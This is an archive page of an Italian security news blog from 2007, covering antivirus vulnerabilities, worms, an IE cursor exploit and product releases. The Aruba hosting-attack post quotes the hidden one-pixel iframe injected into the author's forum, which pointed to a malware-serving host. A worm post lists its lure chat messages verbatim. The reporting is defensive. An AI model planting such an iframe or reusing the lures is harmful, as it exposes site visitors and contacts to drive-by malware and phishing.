.:: Securnetwork.net Blog – Massimo Rabbi ::.

Blog personale di Massimo Rabbi con le ultime news in fatto di sicurezza, software, sistemi operativi e tecnologia
  • Homepage
  • Contact Me
  • Curriculum Vitae
  • Università
  • BlogRoll
  • Downloads

Aggiornamento di sicurezza per avast! antivirus

Massimo Rabbi | 8 dicembre 2007 | 11:32

Alwil ha rilasciato di recente un aggiornamento per il proprio engine di scansione avast! in modo da correggere almeno due bugs di sicurezza.
L’engine antivirus utilizzato in versioni precedenti alla 4.7.1098 di avast! 4 Home e Professional edition è vulnerabile a potenziali attacchi che prendano di mira l’unpacker per file .tar e .rar.
Stando al report almeno nel caso della vulnerabilità riguardante i file .tar, aprire una mail “infetta” o visitare un sito appositamente modificato è sufficiente per incappare nel bug e vedere il proprio sistema compromesso.

Ad ogni modo gli utenti avast! dovrebbero aver già ricevuto la versione aggiornata 4.7.1098 attraverso il sistema di automatic update.
Detto questo, esistono pero’ altri software che utilizzano il motore avast! ma non è chiaro se utilizzino gli unpackers di avast! oppure i propri.
Un esempio sono GDATA AntiVirusKit 2007 e 2008 che utilizzano l’engine avast e sono di conseguenza anch’essi vulnerabili. Anche GDATA sta pensando di distribuire un aggiornamento tra il sistema di update automatico.

RIFERIMENTI:
* Security update for avast! anti-virus, by Heise Security
* Version 4.7.1098, avast! 4 Home/Professional revision history
* Avast! AntiVirus TAR Processing Remote Heap Corruption, security advisory from Nevis Labs

Comments
1 Commento »
Categorie
Sicurezza, Software, Virus & Spyware
Commenti RSS Commenti RSS
Trackback Trackback

Apple patcha il bug dei file TIFF in iPhone

Massimo Rabbi | 14 novembre 2007 | 01:30

Apple ha rilasciato l’aggiornamento firmware 1.1.2 per l’iPhone e iPod Touch, che corregge le falle scoperte nella libreria TIFF, usate dai possessori di iPhone per eseguire codice di terze parti e personale.
Una volta installato da iTunes, l’aggiornamento impedisce l’esecuzione di codice di terze parti sfruttando files TIFF manipolati.
La falla è stata sfruttata in alcune occasioni da utenti malintenzionati per fare injection di codice arbitrario sul dispositivo.

Gli utenti iPhone desiderosi di far girare le proprie applicazioni personali dovranno attendere ora il rilascio del Software Development Kit (SDK), in programma per febbraio 2008.
Detto questo sono pero’ in circolazione su internet nei vari siti e forum dedicati, le istruzioni su come installare l’aggiornamento senza perdere la possibilità di far girare codice di terze parti (vedi Unofficial Apple Weblog).
L’aggiornamento è invece una priorità di sicurezza per tutti coloro che usano l’iPhone o l’iPod Touch per navigare su Internet.

LINKS:
- About the security content of iPhone v1.1.2 and iPod Touch v1.1.2 Updates, Apple’s security advisory
- Apple closes TIFF hole in iPhone, news by Heise Security

Comments
Nessun Commento »
Categorie
Apple, Sicurezza, Sistemi operativi, Telefonia, Virus & Spyware
Commenti RSS Commenti RSS
Trackback Trackback

Vulnerabilità per il controllo ActiveX di Kaspersky Online Scanner

Massimo Rabbi | 14 ottobre 2007 | 12:02

I Kaspersky Lab hanno rilasciato una versione aggiornata del proprio controllo ActiveX che viene installato sul pc degli utenti che usano il Kaspersky Online Scanner.
La nuova versione del componente (kavwebscan.dll) è la 5.0.98.0 e risolve alcuni bug critici che possono essere sfruttati per eseguire codice arbitrario, per esempio quando un ignaro utente sta visitando un sito web, appositamente modificato, con Internet Explorer.

Stando all’advisory pubblicato da iDefense, la vulnerabilità è dovuta ad errori format string in svariate funzioni del controllo.
L’esistenza di una vulnerabilità è stata confermata nella versione 5.0.93.0, ma è probabile interessi anche versioni precedenti.
Per controllare la versione installata sul proprio pc, è possibile controllare direttamente nella cartella
C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner
Nel caso la versione dell’ActiveX non venga mostrata direttamente nel filename è possibile, previo click col tasto destro sull’icona, analizzare il tab “Proprietà”.
Il consiglio è che chiunque utilizzi l’Online Scanner aggiorni immediatamente il controllo.
Per installare l’ultima versione è sufficiente lanciare lo scanner. Un’altra opzione è naturalmente quella di cancellare la dll vulnerabile.

LINKS:
- Kaspersky Lab announces the release of a new version of its free Kaspersky Online Scanner
- Kaspersky Web Scanner ActiveX Format String Vulnerability, iDefense Advisory
- Kaspersky Online Scanner installed vulnerable ActiveX control , by Heise-Security

Comments
Nessun Commento »
Categorie
Sicurezza, Software, Virus & Spyware
Commenti RSS Commenti RSS
Trackback Trackback

Malware che cancella i file .mp3

Massimo Rabbi | 3 agosto 2007 | 00:15

E’ stato scoperto di recente un nuovo tipo di worm, che tenta di cancellare tutti i file MP3 che riesce a individuare all’interno del pc di un utente.
Per fare ciò il worm, chiamato W32/Deletemp3.worm (McAfee), W32.Deletemusic (Symantec) o Win32/AutoRun, si comporta in maniera molto simile a W32/Napir-B, che salì alla ribalta verso la metà del 2005.

Una volta infettato il sistema,Deletemp3, che è stato programmato in Delphi, si aggiunge nell’autostart di Windows in maniera da potersi riattivare ogni qualvolta il pc viene riavviato.
McAfee fa notare come, poichè i percorsi del programma sono fissi, il worm non funziona correttamente in Windows 2000.
Disattiva inoltre il Task Manager e il menu contestuale per le cartelle in Windows Explorer.
Fatto questo procede a cancellare tutti gli mp3 che individua sul disco.
Per propagarsi inoltre, Deletemp3 crea i files autorun.inf e csrss.exe su tutti gli eventuali hard-disk da E: a O:.
Con i dispositivi rimovibili infatti il malware viene eseguito in maniera automatica sfruttando l’autorun, ad esempio inserendo una chiavetta usb infetta.
Il livello di diffusione del virus è tuttavia molto basso e la maggior parte degli antivirus già dispongono delle firme per individuarlo.

LINKS:

  • W32/Deletemp3.worm, Malware description from McAfee
  • New malware deletes MP3 files , news su Heise Security

Comments
Nessun Commento »
Categorie
Sicurezza, Sistemi operativi, Virus & Spyware
Commenti RSS Commenti RSS
Trackback Trackback

Kaspersky anti-phishing zoppica

Massimo Rabbi | 25 luglio 2007 | 11:28

Questa mattina quando ho aperto iTunes per far partire alcuni .mp3 il buon vecchio KIS ha attivato il suo filtro anti-phishing segnalandomi che si stava tentando di instaurare una connessione con un sito http “malevole”.
Al che la cosa mi è sembrata strana. Sul primo momento ho pensato potesse trattarsi di un qualche malware che avesse infettato e “modificato” itunes, per cercare di fregare username e password degli utenti iStore.
In realtà la spiegazione è ben piu’ semplice: si tratta di un semplice falso positivo.
Infatti il mio passo successivo è stato andare a controllare sul forum di kasperksy se qualcuno aveva avuto problemi analoghi, visto comunque che il problema si è presentato oggi per la prima volta.
In effetti più di un utente ha postato a riguardo.
Relativamente al dubbio espresso da un utente riguardo al fatto che l’URL bloccato contenga la stringa “edgesuite.net” che farebbe pensare ad un ipotetico fake URL, posso solo dire che cercando su Google si legge come Edgesuite sia una delle tecnologie fornite da Akamai.
Per chi non conoscesse Akamai, si tratta di una società con una enorme rete di servers distribuita su tutto il pianeta in una settantina di paesi e che viene sfruttata da moltissime mega-aziende del calibro di Microsoft, Google, Yahoo e Apple appunto, per velocizzare la distribuzione di contenuti audio, video e file in generale.
In pratica i servers Akamai fanno da mirrors in maniera perfettamente trasparente all’utente, e cosi’ mentre siamo convinti di scaricare dal sito della Microsoft l’ultimo service pack, in realtà lo stiamo scaricando da uno dei servers Akamai sparsi in giro per il globo.
Qualche info in più su Akamai potete trovarla sul loro sito web e anche su Wikipedia.
Ecco qui l’immagine dell’allarme phising di KIS.

Phishing e Itunes

Detto questo si puo’ stare tranquilli, si tratta solo di aggiornare l’antivirus.
Alle ore 11.26 ho effettuato l’update e il problema non esiste più :-D
Un caso analogo di falso positivo mi era successo con Skype che dalla Difesa Pro-Attiva veniva individuato come keylogger.

Comments
Nessun Commento »
Categorie
Sicurezza, Software, Virus & Spyware
Commenti RSS Commenti RSS
Trackback Trackback

Problemi di sicurezza per i software antivirus

Massimo Rabbi | 16 luglio 2007 | 10:19

I prodotti antivirus ClamAV e AVG contengono alcune vulnerabilità che possono essere sfruttate per eseguire attacchi di tipo DoS (Denial-of-Service) o consentire l’escalation di privilegi di utenti locali.
Nel frattempo, Microsoft ha rilasciato una beta gratuita del proprio prodotto di sicurezza Live OneCare 2.0.

Stando ad un advisory di Metaeye Security, il processing di file RAR corrotti comporta una null pointer dereference, che porta al crash del software ClamAV.
Gli sviluppatori del prodotto hanno rilasciato la versione 0.91, che fixa il bug.

Per quanto riguarda AVG, il kernel driver avg7core.sys soffre di problemi nella fase di processing degli IRPs (interrupt request packets): il risultato è la possibilità per gli utenti di sovrascrivere spazi di memoria del kernel ottenendo i privilegi di SYSTEM.
Il produttore Grisoft ha fornito delle versioni patchate già disponibili per il download in modalità manuale e automatica.

Nella versione OneCare 2.0 beta rilasciata da Microsoft c’è una particolare attenzione per le reti casalinghe. Mentre la versione 1.5 garantiva l’utilizzo di fino ad un massimo di 3 utenti concorrenti, la versione 2.0 fornisce una funzionalità che consente ad un computer di gestire anche tutti gli altri clients.
Questo per esempio consente di gestire in maniera centralizzata gli updates dei sistemi client, restando sempre aggiornati sulla status di sicurezza dei pc controllati.
Gli utenti del software inoltre possono comprare una spazio di storage online per salvare i propri backup in Windows Live Folders.

RIFERIMENTI:

  • Clam AntiVirus RAR File Handling Denial Of Service Vulnerability, security advisory by Metaeye Security
  • Arbitrary kernel mode memory writes in AVG, security advisory by NGSSoftware
  • Download of Microsoft’s Live OneCare 2.0 beta version
  • Download of the current ClamAV version
  • Security holes in antivirus software by Heise Security
  • Comments
    Nessun Commento »
    Categorie
    Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Arrestato in Spagna autore di virus per cellulari

    Massimo Rabbi | 25 giugno 2007 | 13:59

    La polizia spagnola ha proceduto all’arresto di un 28enne sospettato di aver creato e distribuito un virus a più di 115.000 telefoni cellulari.
    Le agenzie di stampa spagnola riportano che la polizia era sulle tracce del sospetto da ben 7 mesi.
    Si tratta del primo arresto effettuato in Spagna con un’accusa di questo tipo.

    Stando agli investigatori il virus infetta unicamente cellulari con il bluetooth attivato e che montano un sistema operativo Symbian.
    Il virus sembra si diffondesse sotto forma di MMS dall’ipotetico contenuto erotico, o a seconda dei casi riportando informazioni sportive o addirittura del software antivirus.
    La polizia ha affermato che gli effetti del virus hanno provocato danni per circa sette milioni di euro.

    Comments
    Nessun Commento »
    Categorie
    Sicurezza, Telefonia, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Server Aruba sotto attacco: siti web italiani nel mirino!

    Massimo Rabbi | 19 giugno 2007 | 10:45

    In questi ultimi giorni sui blog e sui siti web più disparati, non si è fatto altro che parlare del massiccio attacco subito da numerosi siti web hostati su server Aruba.
    Il modus operandi rispecchia in pieno  quanto avvenuto  lo scorso mese per i sistemi di Hosting Solutions.
    L’intrusione ha infatti consentito a degli attacker di modificare le pagine web di svariati siti web inserendo un IFRAME che effettuasse il redirect degli utenti verso siti web contenenti malware.
    Di seguito riporto il link a tre articoli che spiegano molto bene l’accaduto:
    - Server Aruba sotto attacco, allarme in Italia
    - Possibile intrusione nei sistemi Aruba
    - L’italia sotto pesante attacco malware
    Dalle cose lette qui e in altre pagine sembra sia stato sfruttato un tool automatizzato per lanciare attacchi malware: il software in questione è chiamato MPACK.
    Panda Software ha pubblicato un interessantissimo report che analizza nel dettaglio questo tool: lo potete scaricare qui.

    Il problema ha interessato direttamente anche noi di TechTown. In particolar modo è stato colpito il forum con risultante inserimento del seguente frammento IFRAME:
    <iframe src=”http://zaq-home.org/x/index.php” width=”1″ height=”1″></iframe>
    Del problema mi son accorto grazie alla segnalazione di Kaspersky Internet Security che ha prontamente bloccato il tentativo di download di due malware, nella fattispecie due Trojan.Downloader.

    Trojan blocked by Kaspersky

    Acid ha rimosso il problema che sembra fosse dovuto ad una modifica nel campo templates del database del forum dove sembra sia stato aggiunto il codice, in particolare il board wrappers.
    Abbiamo proceduto anche  ad una verifica dei file dell’intero ftp e cercato di verificare se tutto fosse funzionante.
    Nel frattempo Aruba sembra non dire nulla a riguardo. Penso che una comunicazione via mail globale a tutti i propri utenti sarebbe stata cosa buona e giusta, per informare del possibile pericolo e del possibile coinvolgimento nell’attacco di questo o quel server anche in base alle tante segnalazioni degli utenti.
    Il consiglio è quello di tenere sempre l’antivir aggiornato, meglio se di quelli che hanno la funzionalità integrata di web protection.

    Comments
    Nessun Commento »
    Categorie
    Mondo WWW, Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Possibile attacco DoS contro un driver Kaspersky

    Massimo Rabbi | 18 giugno 2007 | 14:36

    I vari prodotti di sicurezza della nota casa Kaspersky lavorano a stretto contatto col sistema operativo, impiegando un driver che tra le altre cose monitora anche le chiamate di sistema di Windows. Il controllo sul passaggio di parametri effettuato dal driver non sembra essere però corretto: ciò apre la porta a possibile attacchi che sfruttando dati non validi portano al crash del sistema.
    Il security provider MatouSec, che ha segnalato il bug, lascia intendere che questa falla potrebbe essere ben più pericolosa di quanto sembri, alludendo a potenziali attacchi di tipo “code injection and execution“.

    I prodotti di sicurezza molto spesso si “agganciano” alle funzioni di sistema con lo scopo di monitorare lo stato di funzionamento ed esecuzione di una macchina.
    Mediante chiamate alla System Service Descriptor Table (SSDT) è possibile determinare quali programmi sono attivi sul computer e cosa stanno facendo: è possibile quindi prendere decisioni appropriate e interrompere per esempio l’esecuzione di un programma che abbia un comportamento “potenzialmente malevole”. Un’altra funzionalità importante è che questo consente di evitare che potenziale malware tenti di intaccare il comportamento dei software di sicurezza stessi.

    Il driver klif.sys si aggancia a svariate syscalls tra cui NtCreateKey, NtCreateProcess, NtCreateProcessEx, NtCreateSection, NtCreateSymbolicLinkObject, NtCreateThread, NtLoadKey2, NtOpenKey e NtOpenProcess.
    Se un programma effettua una chiamata ad una di queste funzioni con parametri non validi, il computer crasha e riparte.

    Un interessante post su RootKit.com di EP_XoFF spiega questa vulnerabilità (presumibilmente piuttosto datata) usando la funzione NtOpenProcess.
    Kaspersky ha reagito alle segnalazioni postando il proprio advisory di sicurezza e annunciando una patch che la compagnia distribuirà a breve tramite il sistema di automatic update.
    Kaspersky ha classificato la minaccia come “low”, poichè richiede che un utente locale esegua il software malevole.
    Stando all’advisory, la vulnerabilità non consentirebbe l’escalation di privilegi o l’esecuzione di codice esterno.
    Le versioni interessate dal problema sembrano essere: Kaspersky Antivirus 6 e 7, Internet Security 6 e 7, Anti-Virus for Windows Workstations 6 e Anti-Virus 6 for Windows Servers, per sistemi operativi da Windows NT a Windows 2003. Sotto Windows Vista sembra che il famigerato crash di sistema non si verifichi.

    Questo annunci conferma la crescente tendenza nella scoperta di bug che interessano software dedicati alla sicurezza. I bug scoperti negli antivirus di F-Secure, Grisoft e Avira (tra gli altri) sono legati a problemi di buffer overflows e format string vulnerabilities.
    Questi fenomeni per la maggior parte sono da imputare il più delle volte ad una carenza per i dettagli durante la fase di programmazione.
    Questo trend non lascia di certo ben sperare, è quindi auspicabile che ci sia un cambiamento di rotta, in virtù del fatto che software come personal firewall e antivirus sono la prima linea di difesa contro la diffusione su larga scala di malware e virus di ogni tipo.

    LINKS:

  • Kaspersky Multiple insufficient argument validation of hooked SSDT function Vulnerability, advisory di MatouSec
  • Exploiting Kaspersky Antivirus 6.0-7.0, bug report di EP_X0FF
  • KLV07-07.Klif.sys calling NtOpenProcess vulnerability, security advisory di Kaspersky
  • Comments
    Nessun Commento »
    Categorie
    Sicurezza, Sistemi operativi, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Ad-Aware 2007 Free finalmente disponibile!

    Massimo Rabbi | 10 giugno 2007 | 00:32

    E’ stata rilasciata il 7 giugno la nuova versione del famoso software per la rimozione di spyware e malware di casa Lavasoft.
    La nuova release targata Ad-Aware 2007 è disponibile in tre versioni: Free, Plus e Pro.

    Ad-Aware 2007 Free Edition Screenshot

    In breve le nuove caratteristiche più importanti:
    - Engine di scansione completamente nuovo: più preciso e più performante
    - Migliorata la tecnologia Code Sequence Identification (CSI) che identifica nuove possibili minaccie e malware nascosto
    - Cambiamenti al sistema di update per risparmiare tempo e risorse
    - Nuovo tool TrackSweep per cancellare le tracce lasciate durante la navigazione
    - Supporto a diversi browser: Internet Explorer, Firefox, e Opera.
    - Nuova interfaccia utente

    Link: Ad-Aware 2007 Free

    Comments
    Nessun Commento »
    Categorie
    Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Panda Antivirus: nuova versione compatibile con Vista

    Massimo Rabbi | 11 maggio 2007 | 11:34

    Panda software ha recentemente rilasciato una versione della sua Internet Security Suite 2007 pienamente compatibile con Windows Vista.
    La nuova versione gira comunque anche su Windows XP e include un modulo backup che consente di effettuare in maniera automatizzata il salvataggio dei dati utente.
    E’ incluso inoltre un “coupon” gratuito di due mesi per l’utilizzo di un servizio di backup online (per il quale è necessario un apposito installer da scaricare) dello spazio di 1 GB.
    E’ stata migliorata la parte anti-rootkit basandosi sul sistema signature-based e sull’analisi del comportamento del software usando il sistema Panda TruPrevent.
    Il filtro di navigazione inoltre ora oltre a bloccare siti di phishing dovrebbe impedire l’accesso a siti che tentino in qualche modo di installare malware sul computer dell’utente.
    Gli utenti delle precedenti versioni di Panda Internet Security Suite 2007 possono scaricare dal sito web la nuova versione ed utilizzare la license key attuale.

    - Annuncio del rilascio della nuova release, sul sito di Panda Software

    Comments
    2 Commenti »
    Categorie
    Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Skype: nuovo worm in circolazione

    Massimo Rabbi | 18 aprile 2007 | 10:38

    Ultimamente il registro del vostro Skype si è popolato una marea di chiamate non risposte? Forse allora dovreste pensare ad una scansione completa del vostro sistema.
    Ironia a parte, ultimamente stando alle rilevazioni di F-Secure, un worm per piattaforma Windows, Pykse (IM-Worm:W32/Pykse.A), farebbe in modo di impostare lo stato di un client Skype in “Non disturbare”, in maniera che un utente non riceva più chiamate in entrata, ma unicamente avvisi di mancata risposta.
    Il comportamento del worm non si limita solo a questo, il virus infatti invia un messaggio a tutti i propri contatti online contenente un link che invita a scaricare il malware. Quanto il programma viene lanciato compare l’immagine di “una donna in abiti succinti” (che fantasia! n.d.r.).
    Dopo aver infettato il computer, Pykse contatta vari siti web aggiornando un contatore che tiene conto del numero di infezioni.
    A parte manipolare i settaggi Skype, il malware non sembra provocare danni veri e propri e nemmeno di scansionare dati sensibili (username, password, etc.). F-Secure non ha dato indicazioni circa il potenziale numero di infezioni.
    Già in dicembre avevamo assistito alla diffusione di un worm per Skype che tentava di scovare le passwords dell’utente.

    LINK:
    - Report sul worm, dal blog di F-Secure

    Comments
    Nessun Commento »
    Categorie
    Mondo WWW, Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Photo Album.zip: un po’ di chiarimenti

    Massimo Rabbi | 16 aprile 2007 | 11:04

    Controllando le statistiche di accesso a Securnetwork mi sono accorto di come ultimamente la pagina più visitata sia quella di qualche giorno fa relativa al post sul virus “Photo Album.zip” che circola in Msn Messenger.
    Andando a vedere le pagine di provenienza, mailing list e forum, mi è capitato di vedere riportate alcune inesattezze: forse chi ha letto in queste pagine non l’ha fatto attentamente.
    Ecco qui alcuni chiarimenti:
    - il virus non è legato ad un contatto msn particolare… vedi per esempio il contatto dadecarlo@hotmail.it che sembra essere stato preso come “fonte primaria” di diffusione virus. Il messaggio con l’invito a scaricare lo zip vi arriva da un qualunque contatto sia stato infettato dal virus e non da uno in particolare.
    - visto che personalmente non ho scaricato lo zip, mi affido a quanto riportato dal sito C.I.S.R.T. del quale ho elencato ben tre post riguardanti il virus… forse qualcuno non si è preso la briga di andare a leggere. all’interno del file .zip pare ci siano un file .pif che è il virus vero e proprio.
    Il virus non lo si prende semplicemente cliccando sullo zip.
    - non avendo preso il virus fortunatamente non mi sono trovato nella situazione di doverlo rimuovere, rispondo quindi anche a coloro che mi hanno contattato via mail, che la procedura di rimozione più esauriente che ho trovato è questa.
    Anche qui avevo segnalato il link nei commenti ma forse qualcuno non ci ha prestato attenzione. Unica cosa da dire è che la procedura chiaramente fa riferimento ad una particolare variante… quindi può benissimo essere che abbia bisogno di qualche aggiustamento o passaggio in più o in meno a seconda della variante in cui si può essere incappati. Se avete altre procedure di rimozioni chiare da segnalarmi fatelo pure, sarò ben lieto di pubblicarlo all’interno del post.

    Spero sia tutto… per altri chiarimenti potete tranquillamente contattarmi… ma almeno questa volta fatelo dopo aver letto attentamente ;-)

    UPDATE 22/04/2007:
    Consultate la guida su p2pforum:
    http://www.p2pforum.it/forum/showthread.php?t=174815
    In particolare scaricate il tool MSNFIX, semplice da usare visto che dal 20 aprile è disponibile anche in inglese!
    Spero sia tutto!

    Comments
    2 Commenti »
    Categorie
    Microsoft, Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Skype Keylogger?

    Massimo Rabbi | 9 aprile 2007 | 09:03

    Dopo la recente reinstallazione ho messo come soluzione di sicurezza all-in-one KIS acronimo per Kaspersky Internet Security.
    Non starò qui a tessere nuovamente le lodi di Kaspersky come prodotto antivirus, secondo me il top attualmente sul mercato, ma segnalo un interessante comportamento del sistema di “Difesa proattiva”.
    Nelle intenzioni questa funzionalità dovrebbe consentire di bloccare e segnalare i comportamenti sospetti da parte di alcuni software che potrebbero rivelarsi virus o malware non ancora scoperti e/o classificati.
    Se da un lato questa funzionalità sembra essere decisamente utile (almeno sulla carta) per “blindare” ulteriormente il proprio sistema, i commenti che si leggono a riguardo su Internet non sono certo dei più entusiasti.
    Detto questo segnalo appunto un caso di falso positivo.
    Nella fattispecie Skype viene segnalato come ipotetico Keylogger

    Skype segnalato come keylogger da Kaspersky Internet Security

    Tutto ok… nulla di cui preoccuparsi anche se di certo Skype non è da classificare come uno di quei “software” dal comportamento chiaro e pulito.
    Su un topic nel forum ufficiale del sito Kaspesky si trova una lista di tutti i software non malware che il sistema di difesa proattiva segnala come virus/badware.
    Link: Kaspersky Proactive Defense “White List”

    Comments
    4 Commenti »
    Categorie
    Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Live Messenger virus: photo album.zip

    Massimo Rabbi | 5 aprile 2007 | 13:55

    Stamattina mi è successa una cosa alquanto singolare.
    Ricevo un messaggio da uno dei miei contatti Msn che mi invita a scaricare un ipotetico album di foto zippato.
    Il testo però che lo precede è chiaramente in inglese…
    “Lmfao hey im sending my new photo album, Some bare funny pictures!"
    al che subito la cosa mi puzza.
    Ecco lo screenshot

    Virus via MSN Messenger Live Backdoor.Win32.IRCBot.aaq

    Morale della favola il virus in questione è Backdoor.Win32.IRCBot.aaq, Kaspersky lo classifica con questo nome.
    I primi a darne notizia sono i cinesi in ben tre post, dove riportano a distanza di qualche giorno il manifestarsi di nuove varianti:
    - POST del 26 Marzo 2007 su C.I.R.S.T.
    - POST del 27 Marzo 2007 su C.I.R.S.T.
    - POST del 3 Aprile 2007 su C.I.R.S.T.

    Il testo che compare nel messaggio msn può variare, i piu’ frequenti sono questi:
    * Lmfao hey im sending my new photo album, Some bare funny pictures!
    * lol my sister wants me to send you this photo album
    * Hey i been doing photo album! Should see em loL! accept please mate :)
    * HEY lol i've done a new photo album !:) Second ill find file and send you it.
    * Hey wanna see my new photo album?
    * looooooooooooooooooooooooooooooooooooooo!! :p
    * OMG just accept please its only my photo album!!
    * Hey accept my photo album, Nice new pics of me and my friends and stuff and when i was young lol...
    * Hey just finished new photo album! :) might be a few nudes ;) lol...
    * hey you got a photo album? anyways heres my new photo album :) accept k?
    * hey man accept my new photo album.. :( made it for yah, been doing picture story of my life lol..

    A quanto pare il virus non è riconosciuto da tutti gli antivirus… non per il momento ancora, anche se la situazione è un po’ migliorata dal momento della sua prima comparsa.

    Comments
    8 Commenti »
    Categorie
    Microsoft, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Code injection per Internet Explorer

    Massimo Rabbi | 30 marzo 2007 | 11:59

    Nel blog di sicurezza di McAfee è stat riportata una vulnerabilità per Internet Explorer 6 e 7 funzionante su un sistema Windows XP SP2 regolarmente aggiornato.
    Questo problema consente ad un attaccante di iniettare codice malevole nel sistema di un utente attraverso mails o pagine web appositamente preparate.
    Manipolando i file dei cursori animati (.ani) è possibile eseguire codice iniettato in un sistema in maniera completamente silenziosa, senza per esempio, causare il crash del browser.

    Inizialmente i ricercatori McAfee hanno scoperto il proof of concept su una messagge board, e di là a poco è comparso il primo esempio di codice malevole.
    McAfee lo identifica come Exploit-ANIfile.c, TrendMicro come TROJ_ANICMOO.AX.
    Stando alla descrizione McAfee una volta che l’exploit è all’interno del sistema, consente il caricamento di altro software malware.
    Nonostante apparentemente questo tipo di exploit non sia molto diffuso, sicuramente molti virus writers sfrutteranno la falla per generare nuovi exploits.
    Il malware è particolarmente subdolo in quanto non causa nemmeno il crash del browser: in questo modo un utente è completamente ignaro di essere sotto attacco.
    McAfee sta ancora esaminando la vulnerabilità.
    Poichè una vera soluzione non è ancora stata trovata il consiglio è quello di utilizzare browser alternativi come Opera o Firefox, almeno fino a quando Microsoft non rilascierà una patch.
    Poichè McAfee ha identificato come altro metodo d’attacco le emails, per gli utenti di Outlook e Outlook Express vale il classico suggerimento di aprire le email in formato testo e non HTML.
    Microsoft non ha ancora confermato il problema e non è chiaro quando McAfee abbia avvisato la casa di Redmond del problema.
    Un problema di sicurezza simile era già stato patchato agli inizi del 2005.

    ALTRI RIFERIMENTI:
    * Unpatched Drive-By Exploit Found On The Web, security advisory in McAfee’s blog
    * Exploit-ANIfile.c, McAfee’s exploit description

    Comments
    Nessun Commento »
    Categorie
    Microsoft, Mondo WWW, Sicurezza, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Anatomia di un trojan

    Massimo Rabbi | 24 marzo 2007 | 10:28

    SecurWorks ha pubblicato una interessantissima analisi di un trojan per Windows.
    Il trojan analizzato è in grado di leggere connessioni SSL, e l’analisi mostra anche come vengano sfruttati i dati catturati dal malware.
    Il Trojan si connette alle funzioni Winsock2, riuscendo così a monitorare il traffico dati anche se questo viene poi criptato con SSL per essere trasmesso in rete.
    I nomi con cui è comparso sono molteplici: Agent.AVV, Small.BS e Ursnif.AG e a quanto pare sembra sfrutti una falla di Internet Explorer per compromettere un computer.
    SecurWorks ha stimato che la variante da loro analizzato ha infettato per lo meno 5.200 postazioni e raccolto informazioni di all’incirca 10.000 accounts.
    Ecco qui il link, buona lettura!

    Analisi SecurWorks: GOZI TROJAN

    Comments
    Nessun Commento »
    Categorie
    Mondo WWW, Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Spyware Terminator 1.8.4.965

    Massimo Rabbi | 9 marzo 2007 | 22:58

    Spyware Terminator è un software gratuito, facile da usare che consente di proteggere in tempo reale e rimuovere spyware, adware, keylogger, trojan horses, browsers hijackers e altri tipi di malware.
    Il tool è dotato di un motore di scansione real-time che consente di essere protetti costantemente e della comoda funzionalità di aggiornamento automatico che consente di sempre avere le ultime definizioni installate.
    Gli spyware individuati possono naturalmente essere eliminati direttamente o conservati in “quarantena”.
    Il tool è scaricabile direttamente dal sito del produttore: HOME PAGE.

    Spyware Terminator 1.8.4.965 Screenshot

    Comments
    Nessun Commento »
    Categorie
    Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    Microsoft One-Care fallisce i test antivirus

    Massimo Rabbi | 7 marzo 2007 | 10:26

    Microsoft Live OneCare si è piazzato ultimo in un test di qualità sulle suite antivirus effettuato da ricercatori austriaci.
    AV Comparatives ha messo a confronto 17 pacchetti di sicurezza per vedere come si comportavano nel riconoscere circa mezzo milione tra virus e malware. Il vincitore è risultato essere G Data Security AntivirusKit (AVK) con una percentuale di fallimento di 0.55%. Una versione completamente aggiornata di OneCare ha invece mancato ben 17.6% del malware (86.600 su 497.600).

    F-Secure, Kaspersky Labs, Avira e AEC hanno ottenuto il risultato Advanced+ piazzandosi nei tests poco dietro a G Data.
    Symantec Norton Antivirus ha riconosciuto il 96.8% delle minaccie ottenendo il riconoscimento Advanced, mentre McAfee VirusScan riconoscendo solo il 91.6% ha ottenuto l’etichetta Standard.
    OneCare non è stato “valutato”, segno questo che chiaramente è molto al di sotto della media di rilevamento standard.

    Comments
    Nessun Commento »
    Categorie
    Microsoft, Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    La sfida di Symantec: Norton 360

    Massimo Rabbi | 27 febbraio 2007 | 10:16

    Symantec ha da poco svelato il suo software all-in-one Norton 360: si tratta di una suite di sicurezza destinata al mercato consumer che ha le caratteristiche di anti-virus, anti-spyware, firewall, intrusion detection, anti-phishing, backup e system tune-up. Il tutto in un unico prodotto.
    Lo scopo è chiaramente quello di rivaleggiare e se possibile “far fuori” McAfee Total Protection e Microsoft OneCare.

    Il vendor ha comunicato che l’utente potrà navigare su Internet dormendo sonni tranquilli, non dovendosi preoccupare di virus o malware di alcun tipo, e nemmeno del sempre crescente fenomeno del phishing.
    La suite è stata pensata e progettata per essere il più semplice possibile, garantendo un grado elevato di automatizzazione dei vari tasks. Inoltre la scansione avviene in background e impatta in maniera molto limitata sulle performances del sistema.

    Comments
    Nessun Commento »
    Categorie
    Sicurezza, Software, Virus & Spyware
    Commenti RSS Commenti RSS
    Trackback Trackback

    « Previous Entries Next Entries »

    Pagine

    • BlogRoll
    • Contact Me
    • Curriculum Vitae
    • Università

    Raccomandazioni

    • Sicurezza

    Categorie

    • Apple (32)
    • Fun & Games (17)
    • Guide e HowTo (2)
    • Hardware (43)
    • Libri e Riviste (2)
    • Microsoft (111)
    • Mondo WWW (163)
    • Musica (2)
    • Networking (46)
    • News dal blog (25)
    • OpenSource (95)
    • Personale (72)
    • Programmazione (20)
    • Riflessioni e considerazioni (43)
    • Sicurezza (250)
    • Sistemi operativi (92)
    • Software (293)
    • Telefonia (21)
    • Tips & Tricks (4)
    • Virus & Spyware (55)

    Spam Blocked

    90.903 commenti di spam bloccati da
    Akismet

